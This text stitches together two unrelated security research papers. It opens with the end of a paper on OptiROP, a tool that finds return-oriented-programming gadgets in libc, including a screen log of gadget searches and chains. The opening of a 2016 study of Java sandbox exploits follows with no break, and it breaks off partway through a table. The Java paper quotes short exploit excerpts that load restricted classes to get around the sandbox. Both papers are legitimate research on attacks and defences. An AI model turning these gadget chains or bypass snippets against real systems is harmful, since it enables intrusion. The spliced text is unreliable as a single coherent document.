load/store register from/to memory,  arithmetic operations and execution branches.
With each gadget, OptiROP also saves information on the regiters being modified, and  
impact to memory (like stack). This is useful to chain the gadgets in the next step.
(II) Upon the user request, we try to combine the gadgets following on some rules  
proposed by [8]. The information on clobbered registers of each gadget is useful to  
match the gadgets so they are not incompatible.
(III) The candidate sequence of gadgets will be verified against the user request. This is  
done similar to how we check for the semantic equivalence of saved formula and user  
formula explained in the section 1.1. The matched gadgets will be present to user as  
result.
OptiROP has been implemented in Python and C++, which took about 10,000 lines of  
code. Attached in the appendix is a screen log of some OptiROP sessions, so the readers  
can see how OptiROP works in reality. 
References 
[1] LLVM project, http://www.llvm.org 
[2] Z3 solver, http://z3.codeplex.com 
[3] Shacham, H et all. “The Geometry of Innocent Flesh on the Bone: Return-into-libc  
without Function Calls (on the x86)”. ACM CCS 2007.
[4] http://llvm.org/docs/Passes.html 
[5] http://llvm.org/docs/LangRef.html 
[6] http://llvm.org/docs/WritingAnLLVMPass.html 
[7] Weiser, M. "Program slicing". Proceedings of the 5th International Conference on  
Software Engineering, March 1981. 
[8] Homescu, A et all. “Microgadgets: Size Does Matter In Turing-complete Return-
oriented Programming”. Usenix WOOT 2012.  
Appendix
Below is a screen log copied from a session of OptiROP. All the text following '#' on 
some lines are comments from the author, but not present in the real output.
quynh@laptop$ ./optirop 
Welcome to OptiROP version 1.0. By Nguyen Anh Quynh, 2012-2013 
Type 'help' for quick introduction on the commands of the tool 
> help 
List of commands: 
- help: quick help on OptiROP commands 
- gen <file> [max-insn]: Generate gadgets for input binary
- load <file>: Load already-gathered gadgets of a particular binary
- constraint <condition>: List of constrainsts of the ROP gadgets to be  
found later 
- preserve <registers>: List of registers to be unmodified at the 
output of the ROP gadgets 
- badchars <chars>: List of bad characters that should not be present 
in the output gadgets 
- reset: Reset (clear) all the constraints, preserves and bad chars 
- search [max-insn]: Start searching for ROP gadgets. The limit of 
number of instructions is max-insn (unlimited by default) 
> gen ./bin-linux-32/libc-2.15.so 4  
This takes a while, please wait .... done! 
Total gadgets: 30424 
Non-duplicated gadgets: 4161 
Time: 10m 26s 
 
> constraint EAX = 0 
OK, set constraint to EAX = 0 
> search 
Searching ... done. 
   2df2e: xor eax, eax; mov esi, [esp+0x18]; add esp, 0x1c; ret 
Modified registers: eax, esi, ZF, CF, SF, OF, AF 
esp += 0x20 
   2ec8b: xor eax, eax; pop esi; ret 
Modified registers: eax, esi, ZF, CF, SF, OF, AF 
   2f0df: xor eax, eax; ret 
Modified registers: eax, ZF, CF, SF, OF, AF 
esp += 0x4 
   341fa: xor eax, eax; add esp, 0x8; ret 
Modified registers: eax, ZF, CF, SF, OF, AF 
esp += 0xc 
   565d0: xor eax, eax; add esp, 0xc; ret 
Modified registers: eax, ZF, CF, SF, OF, AF 
esp += 0x10 
   69936: xor eax, eax; add esp, 0x1c; ret 
Modified registers: eax, ZF, CF, SF, OF, AF 
esp += 0x20 
   7ec09: xor eax, eax; pop ebx; ret 
Modified registers: eax, ebx, ZF, CF, SF, OF, AF 
esp += 0x8 
   83485: xor edx, edx; mov eax, edx; ret 
Modified registers: eax, edx, ZF, CF, SF, OF, AF 
esp += 0x4 
  14868b: mov edi, 0x0; lea eax, [edi]; pop edi; ret 
Modified registers: eax, edi 
esp += 0x8 
Gadgets sent through SMT solver: 932 
Gadgets found: 9 
> preserve ESI, EDX 
OK, preserve registers ESI, EDX 
> search 
Searching ... done 
   2f0df: xor eax, eax; ret 
Modified registers: eax, ZF, CF, SF, OF, AF 
esp += 0x4 
   341fa: xor eax, eax; add esp, 0x8; ret 
Modified registers: eax, ZF, CF, SF, OF, AF 
esp += 0xc 
   565d0: xor eax, eax; add esp, 0xc; ret 
Modified registers: eax, ZF, CF, SF, OF, AF 
esp += 0x10 
   69936: xor eax, eax; add esp, 0x1c; ret 
Modified registers: eax, ZF, CF, SF, OF, AF 
esp += 0x20 
   7ec09: xor eax, eax; pop ebx; ret 
Modified registers: eax, ebx, ZF, CF, SF, OF, AF 
esp += 0x8 
  14868b: mov edi, 0x0; lea eax, [edi]; pop edi; ret 
Modified registers: eax, edi 
esp += 0x8 
Gadgets sent through SMT solver: 787 
Gadgets found: 6 
> constraint EAX = 0; CF = 0 
OK, constraint EAX = 0; CF = 0
> search 
Searching ... done 
   2f0df: xor eax, eax; ret 
Modified registers: eax, ZF, CF, SF, OF, AF 
esp += 0x4 
   341fa: xor eax, eax; add esp, 0x8; ret 
Modified registers: eax, ZF, CF, SF, OF, AF 
esp += 0xc 
   565d0: xor eax, eax; add esp, 0xc; ret 
Modified registers: eax, ZF, CF, SF, OF, AF 
esp += 0x10 
   69936: xor eax, eax; add esp, 0x1c; ret 
Modified registers: eax, ZF, CF, SF, OF, AF 
esp += 0x20 
   7ec09: xor eax, eax; pop ebx; ret 
Modified registers: eax, ebx, ZF, CF, SF, OF, AF 
esp += 0x8 
Gadgets sent through SMT solver: 787 
Gadgets found: 5 
> reset 
OK, reset all the constraints and preserve to None 
> constraint EAX = EDX  
OK, set constraint to EAX = EDX 
> search 
Searching ... done 
   2f279: mov eax, edx; ret 
Modified registers: eax 
   2fcdb: mov eax, edx; pop edi; pop ebp; ret 
Modified registers: eax, edi, ebp 
esp += 0xc 
   55d54: mov eax, edx; add esp, 0x7c; ret 
Modified registers: eax, ZF, CF, SF, OF, AF 
esp += 0x80 
   6c8d2: mov eax, edx; pop esi; ret 
Modified registers: eax, esi 
esp += 0x8 
   7d30e: xchg edx, eax; add [eax], eax; add bh, dh; ret 0x3 
Modified registers: eax, ebx, edx, ZF, CF, SF, OF, AF 
esp += 0x7 
   8a1a4: lea eax, [edx]; pop edi; ret 
Modified registers: eax, edi 
esp += 0x8 
   8a2e4: lea eax, [edx]; ret 
Modified registers: eax 
esp += 0x4 
   e87a4: mov eax, edx; add esp, 0x3c; ret 
Modified registers: eax, ZF, CF, SF, OF, AF 
esp += 0x40 
Gadgets sent through SMT: 294 
Gadgets found: 8 
> constraint EAX = 12  
Searching ... cannot find any gadget! 
Trying to chain other gadgets to meet the requirement ... done 
Chain following gadgets. 
   # stack-top = 12 
   1930e: pop edx; ret       # EDX = 12 
   8a2e4: lea eax, [edx]; ret # EAX = EDX 
Modified registers: eax, edx 
> constraint ECX = ESP  
Searching ... cannot find any gadget! 
Trying to chain other gadgets to meet the requirement ... done 
Chain following gadgets. 
    763d: imul ecx, [esi], 0x0; ret 0x0    # set ECX = 0 
  b8d07: add ecx, esp; ret    # ECX == ESP + 0 = ESP
Modified registers: ecx, edx, ZF, CF, SF, OF, AF
> constraint ECX = [EDX] 
Searching ... cannot find any gadget! 
Trying to chain other gadgets to meet the requirement ... done 
Chain following gadgets. 
   2f279: mov eax, [edx]; ret              # EAX == [EDX]
    763d: imul ecx, [esi], 0x0; ret 0x0     # set ECX = 0 
   c9cdf: xor ecx, eax     # ECX == EAX 
Modified registers: ecx, edx, ZF, CF, SF, OF, AFAn In-Depth Study of
More Than Ten Years of Java Exploitation
Philipp Holzinger1, Stefan Triller1, Alexandre Bartel2, and Eric Bodden3,4
1Fraunhofer SIT,2Technische Universität Darmstadt,3Paderborn University,4Fraunhofer IEM
1{firstname.lastname}@sit.fraunhofer.de,2alexandre.bartel@cased.de
3eric.bodden@uni-paderborn.de
ABSTRACT
When created, the Java platform was among the first run-
times designed with security in mind. Yet, numerous Java
versions were shown to contain far-reaching vulnerabilities,
permitting denial-of-service attacks or even worse allowing
intruders to bypass the runtime’s sandbox mechanisms, open-
ing the host system up to many kinds of further attacks.
This paper presents a systematic in-depth study of 87 pub-
licly available Java exploits found in the wild. By collecting,
minimizing and categorizing those exploits, we identify their
commonalities and root causes, with the goal of determining
the weak spots in the Java security architecture and possible
countermeasures.
Our findings reveal that the exploits heavily rely on a
set of nine weaknesses, including unauthorized use of re-
stricted classes and confused deputies in combination with
caller-sensitive methods. We further show that all attack
vectors implemented by the exploits belong to one of three
categories: single-step attacks, restricted-class attacks, and
information hiding attacks.
The analysis allows us to propose ideas for improving the
security architecture to spawn further research in this area.
1. INTRODUCTION
From a security point of view, a virtual machine’s goal is
to contain the execution of code originating from untrusted
sources in such a way that it cannot impede the security
goals of the host machine. For instance, the code should not
be able to access sensitive information to which access has
not been granted, nor should it be able to launch a denial-
of-service attack. Many virtual machines try to contain un-
trusted code through a so-called sandbox model. Concep-
tually, a sandbox runs the untrusted code in a controlled
environment, by separating its execution and its data from
that of trusted code, and by allowing it only to have access
to a limited and well-defined set of system resources.
This paper investigates more than ten years of insecurities
and exploitation of the Java platform, whose security con-
Permission to make digital or hard copies of all or part of this work for personal or
classroom use is granted without fee provided that copies are not made or distributed
for profit or commercial advantage and that copies bear this notice and the full citation
on the first page. Copyrights for components of this work owned by others than the
author(s) must be honored. Abstracting with credit is permitted. To copy otherwise, or
republish, to post on servers or to redistribute to lists, requires prior specific permission
and/or a fee. Request permissions from permissions@acm.org.
CCS’16, October 24 - 28, 2016, Vienna, Austria
c⃝2016 Copyright held by the owner/author(s). Publication rights licensed to ACM.
ISBN 978-1-4503-4139-4/16/10. . . $15.00
DOI:http://dx.doi.org/10.1145/2976749.2978361cepts rely heavily on such sandbox model. Conceptually, the
Java Runtime Environment (JRE) uses a sandbox to contain
code whose origin is untrusted in a restricted environment.
When executing a Java applet from an untrusted site within
a browser, its access is controlled. Sandboxed applets are
only allowed to perform a very limited set of tasks such as
making network connections to the host they were loaded
from, or display HTML documents.1A second use case of
sandboxing in Java is on the server side: application servers
use the sandbox mechanisms to isolate from one another and
from the host systems the applications they serve.
While conceptually easy to grasp, the Java sandbox is ac-
tually anything but a simple box. Instead it comprises one
of the world’s most complex security models in which more
than a dozen dedicated security mechanisms come together
to—hopefully—achieve the desired isolation. To just give
some examples: bytecode verification must prevent invalid
code from coming to execution, access control must correctly
tell apart trusted from untrusted code, and to prevent the
forging of pointers type checking must in all cases properly
distinguish pointer references from numeric values. As a con-
sequence, the “sandbox” is only as good as the joint security
architecture and implementation of all those different mech-
anisms that comprise the sandbox. Adding to that, the code
implementing the sandbox has evolved over far more than a
decade, involving dozens of developers, with virtually none
of the original creators remaining in charge today, and with
the lead maintenance of Java moving from Sun Microsys-
tems to Oracle Inc. When considering all this, it may come
as less of a surprise that over the years the Java runtime
has seen a large number of devastating vulnerabilities and
attacks, most of which lead to a full system compromise: an
attacker would be able to inject and execute any code she de-
sires, at the very least with the operating-system privileges
assigned to the user running the Java virtual machine [7, 8].
Security vulnerabilities are present in different parts of the
complex sandbox mechanism, involving issues such as type
confusion, deserialization issues, trusted method chaining or
confused deputies.
With Java being a runtime deployed on literally billions
of devices, it is one of the most prevalent software systems
in use today. Hence naturally, Java vendors such as Oracle
and IBM are eager to fix vulnerabilities once they become
known. But over the past years, the crafting of exploits by
attackers and the crafting of patches by vendors has become
a continuing arms race. Oftentimes, security patches lit-
1https://docs.oracle.com/javase/tutorial/deployment/
applet/security.html
erally only “patch” the discovered hole without addressing
the actual underlying security problem. In many cases this
has allowed attackers to replace one patched part of an ex-
ploit by another one based on a newly found, similar root
cause of the vulnerability. In other cases, the fragmentation
of the platform caused additional problems. For instance,
the exploit for CVE-2013-5838 impacting Oracle Java 7 up-
date 25 still works with minor modification on Oracle Java
8 update 74 [7]. Similarly, the exploit for CVE-2013-5456
against IBM Java SDK 7.0.0 before SR6, still works with
minor modifications against IBM SDK 7.1 [8]. In result,
it seems as if even the Java vendors have lost track of the
sandbox mechanisms’ original security goals, the interaction
protocols between those mechanisms and how the security
goals of those individual mechanisms and their interactions
are actually meant to be enforced within Java. One of the
goals of this paper is to bring back to light some of that cru-
cial knowledge, by highlighting the inner workings of past
and current exploits and the vulnerabilities and weaknesses
to which they relate.
In this work we thus present an overdue in-depth study
of all publicly available Java exploits we were able to find.
We harvested 87 different exploits from the Internet and re-
duced each of them to a minimal form, retaining only the
code crucial to achieving the goal of the exploit (full bypass,
DoS, etc.). Each exploit was validated to fulfil its goal on the
Java versions it targets. From the minimal representation,
we next manually split every exploit into independent steps
that we call primitives . This allows us to reason about the
different steps an exploit needs to perform to reach the at-
tacker’s goal, at a level higher than the code. By comparing
primitives, we are able to compare and cluster the behavior
of exploits. This clearly points us to weak spots of the Java
platform which are used in many different attacks.
To summarize, this paper makes the following contribu-
tions:
•a collection of 61 working Java exploits, based on a set of
87 original exploits,
•an analysis and categorization of the Java exploits in terms
of intended behavior and primitives,
•an analysis of Java in terms of its weak spots with respect
to security, and
•potential security fixes for those weak spots.
We make the full documentation of the exploit sample set
publicly available along with this paper2.
The remainder of the paper is organized as follows. In
Section 2, we introduce the reader to the basics of the Java
security model. Next, in Section 3, we detail how we col-
lected the set of Java exploits. We describe how we model
the exploits in Section 4 and explain our findings in Sec-
tion 5. Finally, we discuss the related work in Section 6 and
conclude in Section 7.
2. BACKGROUND
In this section, we provide a basic introduction to the Java
security model. Additionally, we will present a number of
features that do not belong to the core implementation of
the security model, but that will be heavily involved in the
discussions of this paper. We limit ourselves to the crucial
2https://github.com/pholzinger/exploitstudyparts that are required to understand the following exploit
analysis.
2.1 The Java security model
First we will introduce some of the essential mechanisms
of the Java security model. Gong and Ellison provide a more
comprehensive documentation [9].
Classloading.
Before Java applications can be executed, they need to be
loaded into the runtime. For this, the Java platform provides
a set of classloaders. Both the applications and the runtime
itself use these classloaders to dynamically load new code
from various sources, e.g., from the local file system, or net-
work resources. During initialization of the Java runtime,
the Java Virtual Machine (JVM) uses a bootstrap class-
loader to load required parts of the Java Class Library (JCL)
into memory. The JCL contains all the classes that imple-
ment Java’s standard API, such as java.lang.Object , or
java.lang.Class . In the following, we will call such classes
system classes . The JVM loads application classes with an-
other classloader instance, the application classloader . The
process that converts a byte representation of a class into an
instance of java.lang.Class is known as class definition .
Each newly defined class is assigned a protection domain,
which itself is associated with a specific set of permissions.
Classes that were loaded by the bootstrap classloader, in-
cluding all system classes, are trusted classes, and thus as-
sociated with a protection domain that provides all permis-
sions. Application classes are, by default, untrusted and
thus assigned a protection domain with limited permissions.
For security reasons, some parts of the JCL are off limits.
These parts reside in specific packages, known as restricted
packages containing restricted classes . Such classes cannot
be loaded by application classes unless those were explicitly
given permission to do so. Examples for restricted packages
aresun.** , orcom.sun.imageio.** . Well-known restricted
classes are sun.misc.Unsafe and sun.awt.SunToolkit . If
an attacker manages to invoke functionality of restricted
packages, this is usually sufficient for a full bypass of all secu-
rity features. We found that the number of restricted pack-
ages increased significantly over time. Java 1.7.0 contained
four restricted packages (not counting subpackages), version
1.7.0u11 contained eight, but the current version 1.8.0u92
contains 47 restricted packages.
Stack-based access control.
The JCL provides sensitive functionality, such as file and
network access. All those features are guarded by a per-
mission check, triggered through a call to SecurityMan-
ager.check* . Permission checks are implemented by means
of stack-based access control. Whenever a check has been
triggered, the runtime will inspect the call stack to check
whether all calling classes are associated with protection
domains that own the requested permission. If any of the
callers does not have permission to use the desired function-
ality, an exception is thrown to deny access to the function-
ality.
There is one way to diverge from this basic algorithm.
By using AccessController.doPrivileged , a system class
can vouch for the fact that the specific way in which the
sensitive functionality is used is safe to be used also by un-
trusted code. Whenever a permission check has been trig-
gered, stack inspection will stop at the first caller that has
called doPrivileged , and check only permissions of callers
up until there.
Java applications can be run with and without an ac-
tive SecurityManager . If no SecurityManager has been
set, this bypasses all calls to SecurityManager.check* , thus
offering unlimited access to features of the JRE. If, how-
ever, a SecurityManager is in charge, the instance that is
responsible for access control is stored in the private field
java.lang.System.security . Naturally, if an attacker suc-
ceeds in setting this field to null, this results in a full secu-
rity bypass.
Information hiding.
Information hiding, while often not perceived as a security
feature, is in fact crucial to the security of the entire plat-
form. Access to private fields and methods of system classes,
such as java.lang.System.security , allow an attacker to
bypass all security checks. Vulnerabilities that can be used
to circumvent visibility rules are thus highly critical.
Type safety.
Type safety is the last crucial aspect of the Java security
model that we want to highlight. At any time of program
execution, it is important for the runtime to keep track of
the types of objects, and the operations that one may per-
form on them. An attacker can use vulnerabilities to create
type confusion , thus allowing her to perform an action on an
object of type A, while the Java runtime thinks the action
is performed on type B. As an example, the attacker can set
the field CustomClass.security tonull, which is not a secu-
rity breach under normal conditions. If, however, Custom-
Class.security is actually java.lang.System.security —
and the JRE will allow this action only because of a type
confusion—an attacker can use this to disable the Securi-
tyManager . This is why type safety is an essential aspect of
the Java security model.
2.2 Special features
The JRE provides a set of features that we consider special
in the context of this analysis because they conceptually
work against the security model.
One of those features is the reflection API. Using reflec-
tion, executed classes can inspect themselves, other classes,
or the call stack, among other things. On the one hand,
this is a valuable feature, which is used to implement, e.g.,
testing frameworks, debuggers, and development environ-
ments [6]. On the other hand, however, reflection can be
used to bypass information hiding. If given permission, a
class can use the reflection API to modify private field val-
ues of other classes, thus violating visibility rules. Certain
system classes use reflection to implement caller-sensitive
methods. Such methods inspect the call stack and vary their
behavior dependend, e.g., on the immediate caller. One of
those methods is Class.forName . It will use the immedi-
ate caller’s classloader to load a specified class. Another
example is Class.getDeclaredMethods , which will skip a
permission check if only the immediate caller is trusted.
A similar feature is the MethodHandles API. Even though
implemented differently, it can also be used to obtain refer-
ences to methods and fields of other classes during runtime.
Consequently, this feature also poses a risk to the secure
implementation of the Java platform.Finally, we want to highlight deserialization as a risky
feature. Serialization is the process of translating objects,
including their field values, into a storable data format, e.g.,
a byte array. Deserialization is the reverse process of re-
constructing such stored objects in the runtime. One of the
risks involved in this is that attackers can craft arbitrary
serialized objects. A deserialized object may be in a state
that would be impossible to achieve without serialization.
This is risky, because it may give attackers access to objects
they would not normally have access to [17].
The analysis in Section 5 will refer to these features and
provide more details on how they are relevant for Java se-
curity in practice.
3. EXPLOIT SAMPLE SET
We were interested in collecting a large and diverse set
of exploits. To structure our efforts, we followed a multi-
step process. First, we collected exploits from various online
databases and exploit frameworks, including Metasploit (22
exploits)3,Exploit-DB (2)4,Packet Storm (5)5, from the
security research company Security Explorations (52)6, and
an online repository for Java exploits7. Thus we studied
87 exploits in total. The majority of exploits target the
Oracle JDK (64), some the IBM JDK (22) and one is specific
to Apple’s JDK. Most exploits for Oracle’s JDK can also
be run on other vendors’ JDKs, as they involve security
vulnerabilities in the very core of Java. The associated CVE
identifiers, where available, range from 2003 to 2013. We
tagged all original exploits with a unique ID to allow for
easy tracking throughout the analysis.
After our collection process, we tested all exploits in an
isolated environment to verify that the exploits were actu-
ally effective. To do so, we created a common testing frame-
work. For exploits that bypass the Java sandbox model, our
framework sets the SecurityManager to the default Securi-
tyManager , runs the exploit and checks whether the Securi-
tyManager is set to null, afterwards. This allows for testing
all such exploits in a uniform and fully-automated manner.
For exploits that do not aim for disabling the Security-
Manager we tested the effectiveness manually. This includes
all denial-of-service and information-disclosure attacks. We
removed from any further consideration all exploits that we
were unable to run successfully.
Most exploits for the Oracle JDK that we were able to
test successfully run on Java 1.6 or 1.7, few exploits require
Java 1.4 or 1.5. All exploits for the IBM JDK that we were
able to reproduce successfully run on IBM JDK 7.0-0.0 or
7.0-3.0.
Some of the downloaded exploits were hard to read be-
cause they contained large byte arrays with possible pay-
loads. Some of them also contained GUI elements, unnec-
essary reflection constructs, bugs, etc. As a next step, we
thus transformed all exploits that we tested successfully into
minimal exploits . They contain only those lines of code that
are crucial for the exploit to work. Also, as far as possible,
3https://github.com/rapid7/metasploit-framework/tree/
master/external/source/exploits, last accessed 2016-05-20
4https://www.exploit-db.com, last accessed 2016-05-20
5https://packetstormsecurity.com, last accessed 2016-05-20
6http://www.security-explorations.com/en/
SE-2012-01-poc.html, last accessed 2016-05-20
7https://bitbucket.org/bhermann/java-exploit-library, last
accessed 2016-08-03
1// Method loads arbitrary classes
2private Class getClass1 ( String s) {
3 JmxMBeanServer server =( JmxMBeanServer )
JmxMBeanServer .
4 newMBeanServer ("",null ,null , true );
5 MBeanInstantiator i= server .
getMBeanInstantiator ();
6 return i. findClass (s ,( ClassLoader ) null );
7}
Listing 1: Modified excerpt from exploit for CVE-
2013-0431
1// Method loads arbitrary classes
2private Class getClass2 ( String s) {
3 MethodType mt= MethodType . methodType (
Class .class , String . class );
4 MethodHandles . Lookup l= MethodHandles .
publicLookup ();
5 MethodHandle mh=l. findStatic ( Class .class
," forName ",mt);
6 return ( Class )mh. invokeWithArguments (new
Object []{s});
7}
Listing 2: Modified excerpt from exploit for CVE-
2012-5088
we replaced the large byte arrays with the code they con-
tained, creating the byte arrays on demand.8We did this
reverse engineering to facilitate code reviews.
Finally, we compared all sources that we acquired manu-
ally and merged those that were semantically equivalent. At
the end of this process, we ended up with 61 unique, working
exploits that we used as a basis for the analysis.
4. MODELING EXPLOIT BEHA VIOR
4.1 Exploit behavior
The goal of this work is to understand how attackers ex-
ploit the Java platform, and to identify measures of improve-
ment by analyzing the behavior of a large body of exploit
samples. The first essential question that needs to be dis-
cussed is the definition of behavior that will be used through-
out this analysis.
Instead of providing an abstract, formal definition of the
term, let us consider Listings 1 and 2. Both listings contain
one method each, getClass1 and getClass2 , both of which
are able to dynamically load a class. Since they make use
of security vulnerabilities, an exploit can use them to load
arbitrary classes, including restricted ones. As explained
in Section 2, this poses a security risk, as restricted classes
may provide functionality that can be used to disable se-
curity checks. While getClass1 and getClass2 implement
the exact same functionality, they use different implementa-
tions to achieve their goal; getClass1 uses classes JmxM-
BeanServer and MBeanInstantiator , and getClass2 de-
8In some cases, however, this was not possible because the
very nature of the exploit was to work with bytecodes that
cannot be produced from source.pends on MethodHandle instead. If some developer were
to document the behavior of any of these methods, one in-
tuitive way would be to add a code comment similar to the
one in line 1 of Listing 1 and 2, respectively. It simply states
that they can be used to load arbitrary classes . This is on
the right level of abstraction for another developer to un-
derstand the purpose of the methods, that they implement
the same functionality and that they can thus be used in-
terchangeably. This is also the right level of abstraction for
describing the behavior of exploits in the sample set, such
that it allows for identifying common attack patterns and
frequently abused weak points in the Java platform. For
instance, if the analysis revealed that every single exploit
in the entire sample set uses vulnerabilities to dynamically
load arbitrary classes, this could be seen as a clear indica-
tion that the measures implemented to prevent the loading
of restricted classes by untrusted code are fragile and insuf-
ficient. This is the kind of evidence-based conclusion this
exploit analysis is aiming for. Details about how the ex-
ploits implement this functionality are not required to draw
this conclusion. However, these implementation details can
help in understanding why existing countermeasures fail and
may influence the development of new countermeasures.
The behavior of an entire exploit that disables all security
checks is more complex than the code examples provided
in the listings. Functionality to load arbitrary classes could
be one building block of such an exploit, but a complete
description of a full-bypass exploit typically requires more
than one building block to adequately model its behavior on
this level of abstraction. Further, note that the two code
snippets shown rely on different vulnerabilities. Another
purpose of identifying snippets with the same behavior is
thus to see whether one could be replaced by another, e.g.,
when the vulnerability exploited in the first was fixed but
not the one exploited by the second.
4.2 A meta model to document exploits
For purposes of this exploit analysis, we developed a new
meta model that we used as a basis for documenting the
exploits in the sample set. Creating this model was guided
by the following requirements.
•The meta model should focus on behavior (as defined in-
formally in 4.1) and abstract from implementation, i.e.,
specific bug details. Only with this layer of abstraction is
it possible to identify commonalities between the different
exploits, as many of them use entirely different implemen-
tations.
•Our definition of behavior is at a rather low level of ab-
straction. The model must thus allow for documenting
behavior in terms of reusable building blocks, which can
be combined to model complete attacks.
•The analysis shall not only focus on how exploits abuse
vulnerabilities, but also on how they make use of spe-
cific features of the Java platform to achieve their goal.
The model must thus allow for documenting the use of in-
tended functionality, such as the reflection API, or Method-
Handles .
Guided by the above requirements, we developed a new
meta model that we instantiated to document all exploits
in the sample set. As can be seen in Figure 1, this model
comprises the following seven entities:
Attack 
vectorFinal 
goal
PrimitiveHelper 
primitiveAttacker 
primitive
Implemen-
tationExploit achieves
is part of
is a is a
imple-
mentsimple-
mentsimple-
mentsFigure 1: Meta model used to document exploits.
Final goal. This is the most abstract entity in the meta
model. It is used to describe the final goal of an entire
attack by means of a brief textual description. Final goals
express the way in which an attack vector is considered to
be malicious. One final goal can be achieved through one or
more attack vectors, but each attack vector achieves only
one final goal. More than one final goal may be needed
to document an entire set of exploits, as different exploits
may implement different attack vectors.
Example: Information disclosure, denial of service.
Attack vector. An attack vector is one way to achieve a
specific final goal. It is composed of one or more primitives.
Two attack vectors are similar, if they are composed of the
same set of primitives.
Primitive. A primitive is a building block of a vector that
describes specific behavior. Primitives are more abstract
than implementations, but less abstract than vectors. All
primitives describe behavior at the same level of abstrac-
tion. Each primitive can be used as a building block for
more than one vector. There are two kinds of primitives:
helper primitives, and attacker primitives. All primitives
are documented by a set of properties, including a title, a
unique ID, a textual description, preconditions, etc. Each
primitive is instantiated by at least one implementation.
Attacker primitive. An attacker primitive is one specific
kind of primitive that describes behavior that was intro-
duced through a security vulnerability. It violates the se-
curity model of the target system, which must be properly
documented in its description. Each attack vector must be
composed of at least one attacker primitive.
Example: Load arbitrary classes.
Helper primitive. A helper primitive is, besides attacker
primitives, another specific kind of primitive. It describes
behavior that was introduced as a feature of the target
system, as opposed to attacker primitives, which were in-
troduced unintentionally. Each helper primitive is a coun-
terpart to at least one attacker primitive, in the sense that
the corresponding attacker primitives would be useless, or
at least less useful without the helper primitive. A helper
primitive’s description must explain how it is adding value
to attacker primitives. Helper primitives are optional ele-
ments of attack vectors, as not all attacker primitives rely
on helper primitives.
Example: Set of restricted classes that set a specified field
accessible.Implementation. Implementations are specific code se-
quences or APIs that instantiate primitives. As such, they
are at the lowest level of abstraction in the meta model.
Each implementatation instantiates only one primitive, but
a primitive can have multiple implementations.
Example: The codes in Listing 1 and Listing 2 are two im-
plementations for the primitive “load arbitrary classes”.
Exploit. An exploit is a concrete instance of an attack
vector. It represents an executable combination of imple-
mentations for the specific primitives of the attack vector.
Every exploit implements a single attack vector, but two
or more exploits can implement the same attack vector, us-
ing different implementations. As an example, one exploit
makes use of the code of Listing 1, and another exploit
uses the code of Listing 2 instead. If this is the only dif-
ference between those two exploits, we consider them to be
different exploits that implement the same vector.
The meta model, as described above, is by no means spe-
cific to Java exploits. In fact, it is generalizable enough to
be applied in entirely different attack domains.
4.3 Documenting the exploit sample set
The basis of our analysis is the set of minimal exploits that
we integrated into our common testing framework. Each
minimal exploit is based on at least one original exploit that
we obtained online. All minimal exploits are different in the
sense that they either implement different vectors, or they
implement the same vectors using different vulnerabilities or
features. Since all exploits in this sample set are tested and
unique, our analysis only considers reproducible attacks, we
avoid duplicates, and we document only the minimal code
that is actually needed to carry out an attack.
Documenting the sample set for our analysis requires us
to instantiate the meta model. This means, we have to de-
velop a set of final goals, primitives, attack vectors, etc. that
closely resemble the behavior of the actual exploits. The
meta model we developed just describes how to descriptively
document exploit behavior, it does not provide any guidance
or a process that needs to be followed in order to instantiate
the model based upon source code. For this, as we elabo-
rate in the following, we chose an iterative approach with
redundant supervision.
The first step of this effort is to identify final goals. This
is a reasonable way to start the documentation process, as
final goals describe exploit behavior at the highest level of
abstraction and their identification requires little knowledge
about implementation details. After reviewing the entire
sample set, we found that a variation of the classic CIA
triad [13] appropriately reflects the attack goals:
•Information disclosure (3 exploits). There are exploits in
the sample set that reveal sensitive information about the
target system, thus violating confidentiality.
•Full bypass (56 exploits). The largest portion of exploits
in the sample set aims for arbitrary code execution, often
achieved through disabling the active security manager.
•Denial of service (2 exploits). Few exploits attack the
availability of the target system, without achieving infor-
mation disclosure or arbitrary code execution.
The second step of describing exploit behavior is to docu-
ment for each exploit the set of primitives it uses to achieve
its final goal. For this, we properly inspected all exploits
in detail to understand which vulnerabilities and features
they use to perform the attacks. This step required multi-
ple iterations to ensure that all primitives we describe are
on the same level of abstraction. It is obvious that there is a
certain design space when it comes to choosing appropriate
primitives to model exploit behavior. Those primitives are
not given, and there is no ground truth. However, the spec-
ification of new primitives was not done arbitrarily, but, as
we explain in the following, supported by guidance.
The specification of new attacker primitives was triggered
by the security vulnerabilities the exploits use. Each secu-
rity vulnerability, by definition, violates the security model.
Different vulnerabilities may violate the model in the same
way or in different ways; they could depend on different pre-
requisites or cause different postconditions. All those char-
acteristics are part of a primitive’s description. For each vul-
nerability, we evaluated whether there is an already existing
attacker primitive with a matching description. If this was
not the case, we either specified an entirely new primitive,
or we adapted the closest match in the set of primitives.
The specification of new helper primitives was guided dif-
ferently. As opposed to attacker primitives, those are not as-
sociated with vulnerabilities, i.e., unintended behavior, but
rather with intended behavior, i.e., features. The Java plat-
form is feature-rich, and implementing even just simple ap-
plications requires heavy usage of the JCL. However, not all
parts of the class library used by exploits are of interest from
a security point-of-view. To select relevant features, we con-
sulted the list already presented in Section 2. Those are the
features that either implement the Java security model, or
pose a risk to the proper implementation of the model. We
assume that those parts of the class library are more likely
to point to design weaknesses.
At any stage of developing the model we applied redun-
dant supervision: the specification of final goals and prim-
itives, and the documentation of all exploits has been as-
sessed by three analysts. Any misunderstandings or dis-
agreements were resolved in group discussions. The result
of our documentation efforts is a set of three final goals,
27 attacker primitives, and ten helper primitives. Table 1
provides an overview of all primitives used for exploit docu-
mentation. Each exploit is associated with an attack vector,
composed of one or more primitives, each of which is in-
stantiated by one implementation. This documentation is
the basis for the analysis and conclusions in Section 5. We
make the full documentation publicly available along with
this paper9.
5. ANALYSIS AND FINDINGS
In the following we use the extensive documentation of the
61 minimal exploits to provide insight into how attackers use
specific vulnerabilities and features of the Java platform to
implement their attacks. Due to the complexities involved
in exploit implementations, we cannot provide a detailed
view on the exploits’ behavior on the level of primitives, as
this would clearly exceed any space restrictions. Instead,
we derived a smaller set of higher-level weaknesses from the
primitives that we used to document the exploits, as well as
their implementation details. Based on this, we will discuss
the following research questions.
9https://github.com/pholzinger/exploitstudyID Title
H1 Load arbitrary classes if caller is privileged
H2 Lookup MethodHandle
H3 Get access to declared methods of a class if caller
is privileged
H4 Get access to declared field of a class if caller is
privileged
H5 Get access to declared constructors of a class if
caller is privileged
H6 Set of restricted classes that define a user-provided
class in a privileged context
H7 Set of restricted classes that set a specified field
accessible
H8 Set of restricted classes that provide access to de-
clared fields of non-restricted classes
H9 Use confused deputy to lookup MethodHandle
H10 Private PrivilegedAction that provides access to
